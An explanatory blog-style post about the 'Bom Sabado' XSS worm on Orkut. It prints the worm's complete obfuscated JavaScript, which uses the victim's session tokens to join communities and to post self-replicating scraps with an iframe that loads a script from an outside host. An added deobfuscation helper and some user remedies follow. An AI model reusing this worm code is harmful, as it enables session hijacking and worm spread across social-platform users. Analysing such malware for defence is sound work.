BOM SABADO: a Latest Worm Attacks Orkut


Bom Sabado is a Portuguese phrase meaning Good Saturday. This virus broke out on a Saturday and is targeted at hacking Orkut.
Orkut is a Google-owned social networking website that is mostly used by Indians.
A new virus named Bom Sabado has come out to hack Orkut and its users.
This virus works by using the cookies stored in the browser. Bom Sabado automatically writes scrap entries to everyone in your friends list; if someone opens that scrap entry, they are affected by the virus too.
This virus is categorized as an XSS attack. A few days ago this same virus attacked Orkut, and it has now returned with new code. The virus's code has not yet been identified by Orkut programmers. It may take some more days to rectify this issue.

If you get any suspicious scrap entries, don't open them. Just log out of your Orkut account, delete your browser history and cookies, and then change your password. This may protect you from theft of your profile and illegal activities.

How it works?

When anyone opens a page that is infected by this worm, a JavaScript runs automatically. Your browser will hang for some seconds or minutes. The script will automatically join you to its communities. Here you can see links of these communities.

After joining the communities, it sends a scrap to your friends with the text “Bom Sabado!” and an iframe code that loads the JavaScript again for your friends, who will then join the communities and send links to their friends.

Along with the scrap Bom Sabado!, it loads a small iframe code. It loads JavaScript from http://tptools.org/worm.js

Code For Bom Sabado

var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D","x43x47x49x2Ex50x4Fx53x54x5Fx54x4Fx4Bx45x4E","x26x73x69x67x6Ex61x74x75x72x65x3D","x50x61x67x65x2Ex73x69x67x6Ex61x74x75x72x65x2Ex72x61x77","x50x4Fx53x54","x53x63x72x61x70x62x6Fx6Fx6Bx3F","x6Fx70x65x6E","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64x3B","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x26x73x63x72x61x70x54x65x78x74x3D","x3Cx73x74x79x6Cx65x2Fx3Ex3Cx69x66x72x61x6Dx65x20x73x74x79x6Cx65x3Dx64x69x73x70x6Cx61x79x3Ax6Ex6Fx6Ex65x20x6Fx6Ex6Cx6Fx61x64x3Dx22x61x20x3Dx20x64x6Fx63x75x6Dx65x6Ex74x2Ex63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74x28x20x27x73x63x72x69x70x74x27x29x3Bx61x2Ex73x72x63x20x3Dx20x27x2Fx27x20x2Bx20x27x2Fx74x70x74x6Fx6Fx6Cx73x2Ex6Fx27x2Bx27x72x67x2Fx77x6Fx72x6Dx2Ex6Ax73x27x2Bx27x23x3Cx77x62x72x3Ex23x27x3Bx20x64x6Fx63x75x6Dx65x6Ex74x20x2Ex20x62x6Fx64x79x20x2Ex20x61x70x70x65x6Ex64x43x68x69x6Cx64x28x20x61x20x29x22x3Ex3Cx2Fx69x66x72x61x6Dx65x3Ex42x6Fx6Dx20x53x61x62x61x64x6Fx21","x26x75x69x64x3D","x26x41x63x74x69x6Fx6Ex2Ex73x75x62x6Dx69x74x3Dx31","x73x65x6Ex64","x47x45x54","x52x65x71x75x65x73x74x46x72x69x65x6Ex64x73x3Fx72x65x71x3Dx66x6Cx26x75x69x64x3D","x75x69x64","x26x6Fx78x68x3Dx31","x77x68x69x6Cx65x20x28x74x72x75x65x29x3Bx20x26x26x26x53x54x41x52x54x26x26x26","","x72x65x70x6Cx61x63x65","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D","x26x41x63x74x69x6Fx6Ex2Ex6Ax6Fx69x6Ex3Dx31","x31x30x36x36x39x38x38x30x38","x36","x35x35x38x34x39x34","x31x30x36x36x39x38x36x32x38","x31x30x36x36x39x31x33x34x31","x76x61x72x20x66x72x69x65x6Ex64x73x20x3Dx20","x3B","x6Cx69x73x74","x64x61x74x61","x69x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function 
sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;
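
The listing above has lost the backslashes of its \xNN string escapes, so it cannot be read directly. As an added analysis example (not part of the original post or of the worm), this Node.js snippet decodes a few entries copied from the `_0x37a1` table, keyed by their position in that array, and inlines them into three statements from the listing without evaluating anything; the function names are chosen for this example.

```javascript
// Added analysis example. TABLE holds a few entries copied from the
// _0x37a1 array above, keyed by their index in that array.
const TABLE = {
  1: "x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D",
  3: "x26x73x69x67x6Ex61x74x75x72x65x3D",
  5: "x50x4Fx53x54",
  6: "x53x63x72x61x70x62x6Fx6Fx6Bx3F",
  7: "x6Fx70x65x6E",
  15: "x73x65x6Ex64",
  24: "x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D",
};

// Decode a string made only of hex escapes, with or without the
// backslash ("\x50" or "x50"). Anything else is returned unchanged,
// so ordinary text containing an "x" is never mangled.
function decodeHexString(s) {
  if (!/^(?:\\?x[0-9A-Fa-f]{2})+$/.test(s)) return s;
  return s.replace(/\\?x([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Replace every NAME[index] lookup in `code` with the decoded literal.
// Unknown indexes are left as they are. No code is evaluated.
function inlineStrings(code, table, name = "_0x37a1") {
  const lookup = new RegExp(name + "\\[(\\d+)\\]", "g");
  return code.replace(lookup, (whole, idx) =>
    idx in table ? JSON.stringify(decodeHexString(table[idx])) : whole);
}

// Rewrite obj["method"](...) as obj.method(...) for readability.
function dotNotation(code) {
  return code.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
}

// Statements copied from sendScrap() and joinCMM() in the listing.
const SAMPLE = [
  "_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);",
  "_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);",
  "_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);",
];

function deobfuscate(lines, table) {
  return lines.map((l) => dotNotation(inlineStrings(l, table)));
}

console.log(deobfuscate(SAMPLE, TABLE).join("\n"));
```

Index 25 is deliberately absent from the excerpt, so its lookup stays unresolved in the output; adding the remaining table entries resolves the rest of the listing the same way.
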
Solutions:-

Follow these steps:

1. Immediately change your password and security question (including secondary email and mobile number if they also got changed). This will solve the problem.

2. Find out whether some communities have been joined automatically. If so, remove them.

3. If your account has been completely hacked, see here: Orkut account hacked / How to get back hacked Account / Orkut Account taken over by someone


Advanced Solution:-

Open your hosts file with Notepad:

Windows 95/98/Me --> c:\windows\hosts

Windows NT/2000/XP Pro --> c:\winnt\system32\drivers\etc\hosts

Windows XP Home --> c:\windows\system32\drivers\etc\hosts

Windows 7 --> C:\windows\system32\drivers\etc\hosts

Add these lines at the end:

127.0.0.1 tptools.org

127.0.0.1 www.tptools.org


